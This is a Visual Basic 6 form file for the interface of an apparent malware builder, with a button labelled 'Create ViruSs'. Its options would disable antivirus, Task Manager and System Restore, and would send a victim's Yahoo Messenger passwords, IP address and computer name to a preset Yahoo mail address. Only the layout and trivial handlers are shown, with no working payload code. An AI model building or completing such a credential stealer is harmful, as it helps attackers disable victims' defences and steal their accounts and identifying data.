VERSION 5.00 Begin VB.Form Form1 BackColor = &H80000018& Caption = "Form1" ClientHeight = 6300 ClientLeft = 60 ClientTop = 450 ClientWidth = 4695 LinkTopic = "Form1" ScaleHeight = 6300 ScaleWidth = 4695 StartUpPosition = 3 'Windows Default Begin VB.CommandButton Command2 Caption = "Exit !" Height = 495 Left = 3120 TabIndex = 11 Top = 5640 Width = 1335 End Begin VB.CommandButton Command1 Caption = "Create ViruSs" Height = 495 Left = 240 TabIndex = 10 Top = 5640 Width = 1335 End Begin VB.CheckBox Check8 Appearance = 0 'Flat BackColor = &H8000000D& Caption = "Disable Anti Virus All Ver" ForeColor = &H80000008& Height = 375 Left = 2400 TabIndex = 9 Top = 2760 Width = 2175 End Begin VB.CheckBox Check7 Appearance = 0 'Flat BackColor = &H8000000D& Caption = "Disable Yahoo Seave Pas" ForeColor = &H80000008& Height = 375 Left = 2400 TabIndex = 8 Top = 2040 Width = 2175 End Begin VB.CheckBox Check6 Appearance = 0 'Flat BackColor = &H8000000D& Caption = "Disable System Restore" ForeColor = &H80000008& Height = 375 Left = 2400 TabIndex = 7 Top = 1320 Width = 2175 End Begin VB.CheckBox Check5 Appearance = 0 'Flat BackColor = &H8000000D& Caption = "Disable Task Mngr" ForeColor = &H80000008& Height = 375 Left = 2400 TabIndex = 6 Top = 600 Width = 2175 End Begin VB.TextBox Text1 Height = 495 Left = 1200 TabIndex = 4 Text = "ar9sh@yahoo.com" Top = 3480 Width = 3135 End Begin VB.CheckBox Check4 BackColor = &H8000000C& Caption = "Send Computer Name" Height = 375 Left = 120 TabIndex = 3 Top = 2760 Width = 2175 End Begin VB.CheckBox Check3 BackColor = &H8000000C& Caption = "Send Ip Number" Height = 375 Left = 120 TabIndex = 2 Top = 2040 Width = 2175 End Begin VB.CheckBox Check2 BackColor = &H8000000C& Caption = "Send Y! Pw : 8 && 9" Height = 375 HelpContextID = 1 Left = 120 TabIndex = 1 Top = 1320 Width = 2175 End Begin VB.CheckBox Check1 BackColor = &H8000000C& Caption = "Send Y! Pw :7 && 7.5" Height = 375 Left = 120 TabIndex = 0 Top = 600 Width = 2175 End Begin VB.Label Label1 BackColor = &H8000000D& Caption = "Y! Mail To Sending Datas" Height = 495 Left = 120 TabIndex = 5 Top = 3480 Width = 1095 End End Attribute VB_Name = "Form1" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Private Sub Data1_Validate(Action As Integer, Save As Integer) Create End Sub Private Sub Option1_Click() End Sub Private Sub Command2_Click() Unload Me End Sub